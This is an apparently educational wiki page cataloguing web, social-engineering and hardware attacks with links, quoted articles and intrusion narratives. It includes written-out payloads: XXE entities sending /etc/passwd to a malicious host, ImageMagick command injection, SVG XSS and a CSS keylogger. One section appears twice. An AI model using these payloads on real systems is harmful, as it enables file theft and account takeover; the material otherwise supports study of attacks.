Cyber Attacks

From Teach The Net
Revision as of 17:33, 6 November 2018 by Emeth (talk | contribs) (OpSec Violations)
Jump to: navigation, search

Contents

Standard Hacks

https://srcincite.io/blog/2018/10/02/old-school-pwning-with-new-school-tricks-vanilla-forums-remote-code-execution.html

Facebook Business Takeover – These aren't the access_tokens you're looking for https://philippeharewood.com/facebook-business-takeover/

https://randywestergren.com/xss-vulnerabilities-in-multiple-iframe-busters-affecting-top-tier-sites/

Race Conditions

css timing attack jquery(location.hash) https://blog.sheddow.xyz/css-timing-attack/

Information Leakage

Assuming this all works out, the image in this tweet is also a valid ZIP archive, containing a multipart RAR archive, containing the complete works of Shakespeare. https://twitter.com/David3141593/status/1057042085029822464

Client-side Validation

BitGrail javascript validation for withdrawal

BitGrail (a cryptocurrency exchange) was hacked for $170 million, allegedly because "the checks for whether you had a sufficient balance to withdraw were only implemented as client-side JavaScript".
- Tweet

CSRF

Challenges

* Hackme
* Be sure to do both GET (image) and POST (form) examples. 
* To defeat origin header, use image/get hosted on domain (e.g. profile image)
* To defeat CSRF token, have a javascript file that sets the url to a variable name exposing the CSRF token if you include that javascript file. link (also have another where the CSRF token just has to be unused before, or unique, or doesn't validate at all)

Clickjacking

Informative Blog

CSS has a property called position that allows an element to sit on top of another element. In addition, the property pointer-events allows click events to passthrough an element, so that the click is actually registered on the element underneath. When two combined, I can stack a fake button on top of the actual button and trick you to click it...

If you have logged in Facebook, then what you just did was to like my blog post (which I appreciate) without realizing it. This time, opacity is used instead of pointer-events. opacity is a CSS property that controls the opacity of an element. 

People have been exploiting Clickjacking with web widgets. Many social media sites were actually vulnerable to this. For example, you could use Clickjacking to gain followers with Twitter follow button, and a more recent issue on LinkedIn AutoFill button that leaks visitor's infomation to third-party websites. Sites have started fixing it by requiring addition user interactions, for example, open a new window for users to confirm an action. In fact, Likejacking probably no longer works nowadays. If you try to click the above Facebook like button, it may turn into a "Confirm" button which requires you to click again after you click it. Essentially, they now use an algorithm to determine if an embedding site is trustworthy and hence the number of additional user interactions. Ultimately this is a trade-off between usability and security.

However, X-Frame-Options: SAMEORIGIN has a serious flaw... At the time of writing, only Chrome and Firefox have fixed the issue by making the check against all frame ancestors, which is compliant to CSP's frame-ancestors 'self'.

Actually don't even click anything. Malicious websites can simply track your cursor's position and change the invisible button/iframe's position accordingly. So even if you make a click by mistake you will be forced to click on something else.

There's no reliable way to prevent Clickjacking...

- Article

Quickjack

http://samy.pl/quickjack/

SQL Truncation

Challenges

* CTF Sql Truncation Challenge

File Upload/SSRF/XML Parsing

LFI: https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ LFI to RCE tricks: https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html

Exploit Remote Code Execution via jQuery-File-Upload <= 9.x (ImageMagick/Ghostscript) | Vulnspy Blog https://blog.vulnspy.com/2018/10/23/jQuery-File-Upload-9-x-Remote-Code-Execution-With-ImageMagick-Ghostscript/

Challenges

* HackMe File Upload
https://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/ Upload an XSS remote file inclusion vulnerability
XML read files on system, output to remote url
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;"> ]
>
<foo>&callhome;</foo>
https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/
Same XML trick as above, but using a .docx extension (which is just a compressed XML file)
https://web.archive.org/web/20151107145453/www.attack-secure.com/blog/hacked-facebook-word-document
So, according to Mohamed, he created a .docx file and opened it with 7zip to extract the contents and inserted the following payload into one of the XML files:
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://197.37.102.90/ext.dtd"> %dtd;
%send;
]]>
https://web.archive.org/web/20151107145453/www.attack-secure.com/blog/hacked-facebook-word-document
(From web hacking 101 book)
https://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
https://www.davidsopas.com/wikiloc-xxe-vulnerability/
image magick
http://nahamsec.com/exploiting-imagemagick-on-yahoo/
Now, interestingly, ImageMagick defines its own syntax for Magick Vector Graphics (MVG) files. So, an attacker could create a file exploit.mvg with the following code:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)' pop graphic-context
Cookie key from django exposed, can get code execution?
Rails example: https://hackerone.com/reports/134321
Smarty template injecting into email to read files / execute php code
https://hackerone.com/reports/164224


Javascript in filename
https://hackerone.com/reports/329950
https://hackerone.com/reports/330356
Moodle, code injection via math formula
https://blog.ripstech.com/2018/moodle-remote-code-execution/

Microsoft Word Document upload to stored XSS

Microsoft Word Document upload to stored XSS
* File upload on site, only takes in .docx files...
* Extension validation is client-side. Can upload file with any extension.
* File download is triggered via a url, without `Content-Disposition: attachment`, expectation is download is just triggered based off docx extension. So if we can upload a file the browser can render, it will load instead of being downloaded.
* On a test docx file, file downloaded does not exactly match file uploaded - implies some processing is done on the file when uploaded.
* Hack: Take a valid .docx file, upload and then download. Find areas of strings that were not changed by server-side processing, insert html in those areas. Change file extension to .html, and then upload. 'Download' link should now host html page running your javascript.

File upload via android app to get shell

https://asaf.me/2018/07/23/attacking-the-attackers/

Phone call xml parsing

https://hackerone.com/reports/395296

Phar

https://cdn2.hubspot.net/hubfs/3853213/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-....pdf?

Patreon debugger

https://labs.detectify.com/2015/10/02/how-patreon-got-hacked-publicly-exposed-werkzeug-debugger/

SQL Injection

Challenges

sqlinjection without quotes https://eternalnoobs.com/sqli-without-quotes/ source here: https://hack2learn.pw/mysql/

* SQL Injection Auth Code
* SQL Injection Login
* multiple
 For example, the site https://www.rails-sqli.org/ maintains a list of common SQLi patterns in Rails that result from developer mistakes.
drupal: https://hackerone.com/reports/31756
blind
Yahoo Sports Blind SQL https://web.archive.org/web/20140416093035/http://esevece.tumblr.com:80/
blind from email unsubscribe https://hackerone.com/reports/150156

SDK hidden behind access code, but with a deadline

  • idynamo sdk download access code, sent in US mail 1-2 week delivery. But there was a deadline to create the product... and already had the device without the SDK.

Heartland Payment Systems

The complaint said the 2009 data breach can be traced to July 24, 2007, when malicious code was installed on Heartland’s system via an SQL injection attack targeted at collecting magnetic strip sequences. Malware was installed May 14, 2008.  According to Lexington and Beazley, Trustwave’s assessments during this time didn’t result in a report of malicious code or malware on Heartland systems.

As a result of the breach going undetected, per the complaint, hackers accessed roughly 100 million credit and debit card numbers from more than 650 financial service companies, exposing Heartland to more than $148 million settlement fees for its liability, damages, remediation costs and other expenses. Further, Heartland defended itself in at least 16 consumer class action complaints, 14 class actions from financial institutions and four securities class actions.

- Article

Affiliate backend pagination leads to downfall

  • Paul Le Roux hunted by the US Government. They caught him because of a simple SQL Injection flaw in the pagination of an affiliate backend on RX Limited.

A lot of shady services online allow affiliates or resellers to take a cut and expand their reach.

In an invite-only affiliate control panel of this site, there was a SQL injection flag in their pagination. Using this sql injection, dumped database, saw all affiliate payouts including biggest payment receiving affiliates (who tended to be the big names / biggest scammers) along with how they were paid.

Original comment on Hackernews thread featuring this article:

Guys I can tell you how he got caught. At around 2011 I hacked RXLimited backend through a security flaw on christmas eve.

They had one simple SQL Injection flaw in pagination in their affiliate backend. Through this I was able to extract the VPN config of the webserver including the keys, which I then used to log in to their VPN with my computer.

After snooping around a bit, I found that their backup server had Apache directory listing enabled, and I as able to download several hundred megabytes of database backups. I got kicked out of the VPN several times but I was able to continue the download to completion.

From these database backups I extracted the payment information of all affiliates, compiled a list sorted by sum(payouts) desc including SWIFT payment infos and a detailed list of payments to affiliates with date and amount.

This list was submitted through my local law enforcement in the EU to their counterparts in the US. I never heard back from them, but using this info you could easily find out where the money was moved around with all shady figures attached.

You can believe me or not, but it was a nice hobby to fuck the bad guys over. The money moving around in this business still astonishes me. And all through a simple SQLi in pagination in the most remote view of their affiliate backend...
- Link to original Hackernews comment, since censored Archived snapshot of comment

Mongodb injection to account takeover forgot password

https://hackerone.com/reports/386807

Metasploit/CVE Database

Wordpress Challenges

* Sample Repo
* toolkit

Security Company Challenge

Background

Computer security company sells security products. In an effort to get publicity, puts up a secure server, offers a macbook for anyone who hacks into it.

Review products company sells

  • Note that their documentation is on a Confluence wiki. If they use Confluence wiki so heavily for user-facing docs, likely they use them internally too.

Google confluence wiki

  • Find that it's a self-hosted solution, complex and thus hard to update.
  • Scan for their version in CVE database. Find a hit! CVE-2015-8399 allows unauthenticated users to browse and read files from disk that are accessible to the Confluence user, and docs.inversoft.com was vulnerable to it
  • Review files capable of reading through above exploit, find nothing of significance (no configuration file).

Nmap scan on domain where confluence wiki was hosted

  • Find postgres database, mysql database, elasticsearch, ssh, several http services. Get versions of each.
  • Find elasticsearch is old, and thus vulnerable to CVE-2015-1427 which allows remote code execution.

Now have SSH access as non-root user

  • Could read anything elasticsearch could see, Confluence was also running under this same user!
  • Scanning around, found database credentials confluence used to talk to postgres.
  • Used credentials above to get a dump of the Confluence database for off-line perusing.

scanning the database

  • It was indeed used for internal documentation
  • Contained various passwords and keys, including a linode username/password (the target was on linode). Turns out it's a valid, but wrong, linode account.

thinking through next steps

  • use our access to intercept a password reset email for the real linode account?
  • use our access to make a convincing phish email
  • Rescanning our existing gathered info... find in the elasticsearch account's root directory a variety of shared dev files, including api keys to the real linode instance! Connect in, dump db.

Overall

  • utility servers used by devs are the key

Article

MySQL: sql injection escalate to code execution CVE-2016-6662

- Article

XSS

Challenges

Vue.js Server-side XSS
* XSS attack is filtered out, but can inject a vue.js template e.g. `Template:Constructor.constructor("alert('xss')")()`
* This exploit is possible because the app is mixing serverside rendering and clientside rendering.
Angular too: https://hackerone.com/reports/125027
Jinja: https://hackerone.com/reports/125980
Cookie stealing challenge
And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):
Cheatsheet
html injection via encoding
https://hackerone.com/reports/104543
markdown processing injection (instead of bbcode)
https://hackerone.com/reports/112935
Error message embedding / phishing html
https://hackerone.com/reports/111094
Myspace Samy worm
Blind XSS (e.g. renders fine on user side, but admin side has a special page that doesn't escape it). XSS Hunter tool.
Reflected XSS (e.g. via search): https://hackerone.com/reports/106293
XSS in file name shopify example: https://hackerone.com/reports/95089
Bypass CSP https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa

XSS with SVG?

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22%3E 

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('You have been hacked!');
</script>
</svg>
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22%3E 

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS');
</script>
</svg>
- Post 1
- Post 2

XSS bypass tricks

Site replaces all urls with redirector... but not their own urls. Can use double slash to bypass. https://samcurry.net/the-12000-intersection-between-clickjacking-xss-and-denial-of-service/

XSS to RCE in Atom

https://statuscode.ch/2017/11/from-markdown-to-rce-in-atom/

Spoofing

Challenges

- Hackme Social Engineering

Spoof 2-factor auth text message

The reader’s daughter had received a text message claiming to be from Google, warning that her Gmail account had been locked because someone in India had tried to access her account. The young woman was advised to expect a 6-digit verification code to be sent to her and to reply to the scammer’s message with that code.

Cobb’s daughter received the scam text message because she’d enabled 2-factor authentication on her Gmail account, selecting the option to have Google request that she enter a 6-digit code texted to her cell phone each time it detects a login from an unknown computer or location (in practice, the code is to be entered on the Gmail site, not sent in any kind of texted or emailed reply).

In this case, the thieves already had her password — most likely because she re-used it on some other site that got hacked. Cobb says he and his daughter believe her mobile number and password may have been exposed as part of the 2012 breach at LinkedIn.

In any case, the crooks were priming her to expect a code and to repeat it back to them because that code was the only thing standing in the way of their seizing control over her account. And they could control when Google would send the code to her phone because Google would do this as soon as they tried to log in using her username and password. Indeed, the timing aspect of this attack helps make it more believable to the target.

- Article
T-Mobile's website had a security flaw with a url endpoint which returned a user's email address, accounts and a phone's IMSI network code. This url was passed the user's phone number in the URL, but a user could edit that phone number to any other T-Mobile number and obtain the information on it. This information is all that's for a hacker to call T-Mobile and transfer control of the phone number to a different sim under their control. With control of the phone number, they can now receive 2-factor auth text messages. 

In fact, this is exactly what happened to Techcrunch writer John Biggs on August 22nd. After impersonating him and obtaining a replacement for his T-Mobile SIM, a hacker was able to quickly change his Gmail, Facebook, and other passwords, even though they were protected by two-factor SMS authentication.

- Article
- Video demonstrating the exploit
- Techcrunch writer's side of the story
In these cases, the fraudsters can call a customer service specialist at a mobile provider and pose as the target, providing the mark’s static identifiers like name, date of birth, social security number and other information. Often this is enough to have a target’s calls temporarily forwarded to another number, or ported to a different provider’s network.
- Krebs Article

More stories of porting/stealing cell phone numbers to defeat 2 factor auth:

Typo-squatting a domain for SSH password

Question: When you accidentally attempt to connect to the wrong server with password credentials is it possible for the administrator to read and log the password you used?

Answer: Yes

- Stackoverflow Question

GMAIL sent folder spoof

Spoofing FROM address to get into GMAIL Sent folder
* A normal spoofed 'from' email, sent FROM a gmail user TO another gmail user, will actually appear in the SENT folder of the real FROM user's account.

Unicode characters in URL spoof

Spoofing URL with look-alike unicode characters on Firefox / TOR Browser
* Firefox (and Tor Browser) display unicode characters in the URL indistinguishably from ascii characters. Chrome and other browsers convert them to punycode.

CEO whaling/spear phishing

Whaling is a well-oiled social engineering scam that sees criminals dupe financial controllers at large lucrative organisations. Whalers' main method is to send emails that appear to originate from chief executive officers, bearing instructions to wire cash into nominated bank accounts.

It works. The FBI estimates some $2.2bn (£1.7bn, A$2.9bn) in losses have arisen from nearly 14,000 whaling cases in the seven months to May this year. Some $800m (£601m, A$1bn) in losses occurred in the 10 months to August 2015.
Harpooned companies include Mattel, which shipped and by dumb luck recouped $3m its executive sent to a hacker's Chinese bank account; Ubiquiti, which lost $46.7m in June last year; and Belgian bank Crelan, which lost $78m in January.

They join Accenture, Chanel, Hugo Boss, HSBC, and countless smaller victims.

- Article
Brisbane council loses $500k to scammers

- Article
Barbie-brained Mattel exec phell for phishing, sent $3m to China

- Article
Ubiquiti stung US$46.7 million in e-mail spoofing fraud

- Article
Vigilante hacks back at CEO wire transfer scammers, sending a poisoned PDF pretending to be a transaction confirmation. When opened, "We were able to get the Windows 10 usernames and hashes which are tied by default to Outlook."

- Article

Spoofing Banks

Someone had sent emails to the bank’s employees with Microsoft Word attachments, purporting to be from suppliers such as ATM manufacturers. It was a classic spear-phishing gambit. When opened, the attachments downloaded a piece of malicious code based on Carberp, a so-called Trojan that unlocked a secret backdoor to the bank’s network. The malware siphoned confidential data from bank employees and relayed the information to a server the hackers controlled. Delving deeper, the Kaspersky team found that intruders were taking control of the cameras on hundreds of PCs inside the organization, capturing screenshots and recording keystrokes. Soon, the researchers learned that other banks in Russia and Ukraine had been hacked the same way...

Just as the police started to make strides, the Carbanak crew opened another front, says Kaspersky’s Emm. In the first half of 2016, the thieves sent spear-phishing emails that looked like messages from legitimate financial institutions. When bank employees opened the emails’ attachments, they downloaded malware based on a program called Cobalt Strike, which is designed to let security officers hack their own institutions to find vulnerabilities, like in a war game. The Carbanak-Cobalt gang was able to extract $12 million per heist, says Europol. The thieves’ nimbleness was sobering. “Sometimes the investigation looked good,” Ruiz says, “and sometimes it looked like we’d reached a dead end.”

- Article

DOS

Block Skype Accounts trivially

Block anyone's Skype account
* Have about 20 different accounts search for target user X and click Report User
* Done, victim is now blocked from Skype and locked out.

Shutdown iPad Kiosks with sunlight

This reminds me of a “bug” I found when working for a company that sells package lockers to apartment buildings. We used iPads for the user interface and had monitoring in place to alert us if an iPad went offline.
At only one location with two iPads one would go offline almost every day (but not every day) between 12pm and 1pm, for 10-20 minutes. Never the same time of day, and never the same length of time. It was always the same iPad, the other one on that network stayed online the entire time.
We replaced the iPad and the problem persisted. Finally I got fed up, put my phone on silent, ignored everything, and watched the Dropcam feed for the 2 hours near the usual time. Slowly I saw the sun light up the lockers, eventually shining on the iPad. Ten minutes later, after sitting in direct sunlight, it went offline. As the sun moved, the iPad went back in to shadow and came online on its own.
It was overheating and shutting itself off until it cooled down. The time changed because day lengths change, and the days it didn’t go offline were cloudy.
- Hackernews thread

DNS Rebinding

Tools

* Open source tool: Jaqen
* Hosted tool used via subdomains: rbndr
* Defcon Talk: Achieving reliable DNS rebinding 2017

Electrum, a bitcoin client

* Has a JSON-RPC api enabled by default, and CORS is enabled. This made it trivial for any website to connect to your wallet's api and dump the seeds. In this Github Issue, developers decide to disable CORS. This still makes it vulnerable to DNS rebinding attacks.

Metasploit/CVE Database

Wordpress Challenges

* Sample Repo
* toolkit

Security Company Challenge

Background

Computer security company sells security products. In an effort to get publicity, puts up a secure server, offers a macbook for anyone who hacks into it.

Review products company sells

  • Note that their documentation is on a Confluence wiki. If they use Confluence wiki so heavily for user-facing docs, likely they use them internally too.

Google confluence wiki

  • Find that it's a self-hosted solution, complex and thus hard to update.
  • Scan for their version in CVE database. Find a hit! CVE-2015-8399 allows unauthenticated users to browse and read files from disk that are accessible to the Confluence user, and docs.inversoft.com was vulnerable to it
  • Review files capable of reading through above exploit, find nothing of significance (no configuration file).

Nmap scan on domain where confluence wiki was hosted

  • Find postgres database, mysql database, elasticsearch, ssh, several http services. Get versions of each.
  • Find elasticsearch is old, and thus vulnerable to CVE-2015-1427 which allows remote code execution.

Now have SSH access as non-root user

  • Could read anything elasticsearch could see, Confluence was also running under this same user!
  • Scanning around, found database credentials confluence used to talk to postgres.
  • Used credentials above to get a dump of the Confluence database for off-line perusing.

scanning the database

  • It was indeed used for internal documentation
  • Contained various passwords and keys, including a linode username/password (the target was on linode). Turns out it's a valid, but wrong, linode account.

thinking through next steps

  • use our access to intercept a password reset email for the real linode account?
  • use our access to make a convincing phish email
  • Rescanning our existing gathered info... find in the elasticsearch account's root directory a variety of shared dev files, including api keys to the real linode instance! Connect in, dump db.

Overall

  • utility servers used by devs are the key

Article

MySQL: sql injection escalate to code execution CVE-2016-6662

- Article

Political Hacks

Hacking Democrat files 2003

Miranda said that he gained access to the documents after a junior staffer on the committee discovered that they were posted on a server shared by Republicans. He acknowledged reading many of the documents and said he mainly used them to glean insights into how Democrats were preparing for hearings.
[...]
A congressional report blamed Miranda and another staffer for viewing the documents, and Miranda resigned from a Senate position in 2004. He said in the interview that he was never charged in the matter and that he never it considered his action to be hacking, because the documents were on a shared computer server.
Source
The Nomination Unit clerk was interviewed on November 23, 2003, as part of this investigation and subsequently re-interviewed twice, with counsel present, later in the investigation. His version of events remained consistent each time he was interviewed and the investigation verified much of what he told investigators. He and his counsel remained cooperative throughout the investigation.

The clerk first became aware that he could access the files of Democratic staff some time in October or November of 2001. He made this discovery after watching the Committee's Systems Administrator perform some work on his computer. An admittedly curious person, the clerk attempted to duplicate what the System Administrator had done. In so doing, he was able to observe all of the network's other users' home directories. He then clicked on different folders to see which ones he could access; he was able to access some folders, but not others. The folders that he could access, he stated, belonged to both Republican and Democratic staff.

The Nominations Unit clerk reported that he had access to the home directories of other users shortly after beginning his employment in the fall of 2001 until the spring of 2003. Initially he printed approximately 100-200 pages of documents pertaining to Judge Pickering's nomination and gave them to one of his supervisors. Two days later that supervisor and another admonished him not to use the Democratic documents and those that he had given his supervisor were shredded.

Manuel Miranda joined the staff of the Judiciary Committee in December 2001. A short time after Mr. Miranda was hired, the clerk showed him how he could access Democratic files. The clerk who initially discovered how to access the files told investigators that he was not sure what to look for in the files, so Mr. Miranda would guide him as to what information was helpful. Mr. Mirandawould often suggest which directories he should concentrate on and would sometimes tell him that there was something new in a particular folder and ask the clerk to print it for him. Mr. Mirandaadmitted accessing the computer files of Democratic staff himself on one or two occasions.

The Nominations Unit clerk explained that he frequently searched the folders of some Democratic staff on an almost daily basis while working on the nomination of Judge Priscilla Owen. In fact, over the course of accessing other users' files for approximately 18 months, the clerk downloaded thousands of documents. Forensics analysis of a compressed zip folder from his workstation where he kept these documents identified 4,670 files, the majority of which appeared to be from folders belonging to Democratic staff. During the approximately 18 months the clerk accessed other users' files, he stated that he had four or five different computers assigned to him and that regardless of the hardware he used he was able to access this information.

In January 2003, Mr. Miranda left the Judiciary Committee and took a position in the office of Majority Leader Frist. The Nominations Unit clerk and Mr. Miranda both admitted that the clerk continued to provide Democratic - and also Republican - documents to Mr.  Miranda after he left the Judiciary Committee. Forensic analysis of the e-mail traffic between the two confirms this. In March or April 2003, the clerk was re-assigned to another Unit in the Judiciary Committee. About the same time (April 2003) the Committee's server was upgraded and the clerk believed that prevented him from being able to access other users' files on the server.

[...]

The forensic review of the Judiciary Committee servers that was conducted is consistent with the clerk's explanation of how he was able to access democratic files. The forensic analysis provided investigators with two "snapshots" of the network's permission settings - one from July 2003 (when a file copied from the older server in April was deleted) and one from November 2003 when the server was imaged for this investigation.

The forensic analysis indicated that a majority of the files and folders on the server were accessible to all users on the network. Any user on the network could read, create, modify, or delete any of the files or folders within these folders. The investigation revealed that users whose network profiles were established prior to August 2001- when a new System Administrator was hired by the Committee - were generally established correctly and had strict permissions; those established after the date were "open." The investigators do not believe that the Committee's System Administrator acted maliciously, or that he himself inappropriately accessed any user's files. Rather, this significant security vulnerability appears to have been caused by the System Administrator's inexperience, and a lack of training and oversight. This System Administrator left the Committee in July 2003, but permissions remained "open." Forensic analysis of the Judiciary Committee server when this investigation began in November 2003 indicates that the system was even more open to all users on the network at that time.

Despite this significant lack of security, the investigation did not reveal any evidence that users continued to access other users' files after the Nominations Unit clerk stopped doing so in April 2003. Other than the Democratic documents in question, no one who was interviewed brought forth any other documents that they believed had been compromised from the computer system.

The investigation did not identify any individuals, other than the clerk and Mr. Miranda, who were accessing other users' files on the Judiciary Committee computer network. While the clerk admitted to accessing and printing approximately 100-200 pages of documents and providing them to his supervisor in October or November of 2001, they did not know how he had obtained the documents or that he continued to access additional Democratic documents. Additionally, the supervisors did not bring the matter to the attention of the Staff Director. A forensic analysis of the hard drives of both supervisors was conducted and none of the Democratic documents at issue resided on either drive.

The Nominations Unit clerk identified other Judiciary Committee staff members within the Nominations Unit whom he believed knew Democratic computer files were accessible.

Investigators interviewed all of those individuals that were identified as having knowledge about access to Democratic files. Of those interviewed, only one - the Committee's former System Administrator who was working part-time on developing a database for the majority - knew that any users' folders were inappropriately open to others. This individual did not know the extent of the problem and thought the System Administrator was just "sloppy" with setting some users' permissions. He did not advise the System Administrator of his discovery.

In the interviews that were conducted, to date no other individuals on either the Republican or Democratic staffs admitted that they knew that access could be obtained to the other's files. There was speculation among those interviewed that if Mr. Lundell learned how to get access to Democratic files, others on the Committee were probably doing the same thing. The Democratic staff working on judicial nominations clearly did not know there was a vulnerability. If they had, presumably they would have protected their files.

Source

Novel Hacks

Hacking a Smart Lock

Well, it turns out the lock broadcast its own Bluetooth MAC address over the airwaves, and uses that MAC address to calculate a key used to lock and unlock the device.

Tierney cracked the system disturbingly quickly: "It upper cases the BLE MAC address and takes an MD5 hash. The 0-7 characters are key1, and the 16-23 are the serial number." The upshot? He was able to write a script, port it to an Android app, and open any nearby Tapplock wirelessly using his phone and Bluetooth, taking less than two seconds each time.

Security researcher Vangelis Stykas published a blog post on Friday outlining that Tapplock API endpoints have literally no security checks beyond checking whether there was a valid token.

So if you create a Tapplock account and gain a login, you will be able – again – to open every single Tapplock out there.

That's right, Tapplock is literally handing out all the information people need to not only access others' locks but where you can find them physically.

- Article

CSS3 get visual look of iframe across origins hack

Get pixels from iframe across origin (patched in latest browser)
https://www.evonide.com/side-channel-attacking-browsers-through-css3-features/
https://github.com/breakthenet/css3-side-channel-attack/tree/master
Get visited links, same hack as above (not patched)
https://lcamtuf.blogspot.com/2016/08/css-mix-blend-mode-is-bad-for-keeping.html

Stealth Cell Tower

Stealth Cell Tower is an antagonistic GSM base station in the form of an innocuous office printer. It brings the covert design practice of disguising cellular infrastructure as other things - like trees and lamp-posts - indoors, while mimicking technology used by police and intelligence agencies to surveil mobile phone users.

Masquerading as a regular cellular service provider, Stealth Cell Tower surreptitiously catches phones and sends them SMSs written to appear they are from someone that knows the recipient. It does this without needing to know any phone numbers.

With each response to these messages, a transcript is printed revealing the captured message sent, alongside the victim’s unique IMSI number and other identifying information. Every now and again the printer also randomly calls phones in the environment and on answering, Stevie Wonder’s 1984 classic hit I Just Called To Say I Love You is heard.

- Article

Self-Propagating Smart Light Bulb Worm

Abstract: Within the next few years, billions of IoT devices will densely populate our cities. In this paper we describe a new type of threat in which adjacent IoT devices will infect each other with a worm that will spread explosively over large areas in a kind of nuclear chain reaction, provided that the density of compatible IoT devices exceeds a certain critical mass. In particular, we developed and verified such an infection using the popular Philips Hue smart lamps as a platform. The worm spreads by jumping directly from one lamp to its neighbors, using only their built-in ZigBee wireless connectivity and their physical proximity. The attack can start by plugging in a single infected bulb anywhere in the city, and then catastrophically spread everywhere within minutes, enabling the attacker to turn all the city lights on or off, permanently brick them, or exploit them in a massive DDOS attack. To demonstrate the risks involved, we use results from percolation theory to estimate the critical mass of installed devices for a typical city such as Paris whose area is about 105 square kilometers: The chain reaction will fizzle if there are fewer than about 15,000 randomly located smart lights in the whole city, but will spread everywhere when the number exceeds this critical mass (which had almost certainly been surpassed already).

To make such an attack possible, we had to find a way to remotely yank already installed lamps from their current networks, and to perform over-the-air firmware updates. We overcame the first problem by discovering and exploiting a major bug in the implementation of the Touchlink part of the ZigBee Light Link protocol, which is supposed to stop such attempts with a proximity test. To solve the second problem, we developed a new version of a side channel attack to extract the global AES-CCM key that Philips uses to encrypt and authenticate new firmware. We used only readily available equipment costing a few hundred dollars, and managed to find this key without seeing any actual updates. This demonstrates once again how difficult it is to get security right even for a large company that uses standard cryptographic techniques to protect a major product.

- Schneier article, Article

Inaudible Sound Attacks

- Cuban Sonic Weapon Attack - Reverse Engineered

- Alexa/Siri attacks: Dolphin Attack Article / Dolphin Attack Paper

- Embedding the above attack into music

Tracking Pixel Service to decrypt emails

  • Client sends you an encrypted email, asks you to append tracking pixel. You do so and then forward it along.
  • Your tracking pixel actually sends you the decrypted version of the email from the client's machine.
  • Some mail clients concatenate all parts of a multipart message together, even joining partial HTML elements, allowing the decrypted plaintext of an OpenPGP or S/MIME encrypted part to be exfiltrated via an image tag.

Hackernews thread Article

Project a voice with a laser

This specific project, called Non-Lethal Laser Induced Plasma Effects (NL LIPE), aims to have a perfected a beam that can produce audible instructions and commands to an individual or a small group of people within three years and maybe have a practical prototype system ready in five years.
- Article

Casino Hacked Through Fish Tank Thermometer

A casino was hacked through its Internet-connected thermometer in an aquarium in its lobby. Hackers exploited a vulnerability in the thermostat to get a foothold in the network. Once there, they managed to access the high-roller database of gamblers and then pulled it back across the network, out the thermostat, and up to the cloud.
- Article
A North American casino recently installed a high-tech fish tank as a new attraction, with advanced sensors that automatically regulate temperature, salinity, and feeding schedules. To ensure these communications remained separate from the commercial network, the casino configured the tank to use an individual VPN to isolate the tank’s data. However, as soon as Darktrace was installed, it identified anomalous data transfers from the fish tank to a rare external destination. 
- Report

World of Warcraft: RemoveExtraSpaces

World of Warcraft supports add-ons to their interface in the Lua script language. Because of this, they have a robust api for these add-ons to use.

For this attack, the attacker must convince the player to enter one single command into their chat window:

/run RemoveExtraSpaces=RunScript

In this command, '/run' says to interpret what follows as a Lua script, 'RemoveExtraSpaces' is a built-in function that removes extra spaces from text, and 'RunScript' in a built-in function that executes text as Lua script (similar to eval in javascript).

The function 'RemoveExtraSpaces' is executed on every chat message a player receives, so in effect the above command causes every chat message the player receives to be executed as though it's Lua script.

Now the attacker can simply whisper the victim player to cause the user's interface to do anything he wishes, or to extract information about the player. He can (for example), extract the current player's location in game from his UI, approach the player in game, and then open a trade with the player and force the player's UI to hit the accept button.

[Article]

CSS Keylogger

Concept (repeat for every ascii character):

input[type="password"][value$="D"] { background-image: url("http://localhost:3000/D"); }
  • Works for password inputs that update 'value' attribute with the typed in value, a common pattern in React.
  • For password managers like LastPass, you can get the first character with [value^=a], the last value [value$=a], and anywhere in the string [value*=a]. Could target like first two and last two and any in middle with around 13000 combinations.

Open Source Lib

Jumping Airgaps

Guri and his fellow Ben-Gurion researchers have shown, for instance, that it's possible to trick a fully offline computer into leaking data to another nearby device via the noise its internal fan generates, by changing air temperatures in patterns that the receiving computer can detect with thermal sensors, or even by blinking out a stream of information from a computer hard drive LED to the camera on a quadcopter drone hovering outside a nearby window. In new research published today, the Ben-Gurion team has even shown that they can pull data off a computer protected by not only an air gap, but also a Faraday cage designed to block all radio signals.
- Quoted from Schneier's blog, which quotes from here

Page with all research results

Overall concept:

  • Drop a USB drive with malware in a parking lot. Employee picks it up, and sticks it in an air gapped machine to see what's on it. This infects that machine.
  • Now we have a machine not connected to the internet that is infected... use one of the proposed concepts above to exfiltrate the data.

Damaging Hard Drives with an Ultrasonic Attack

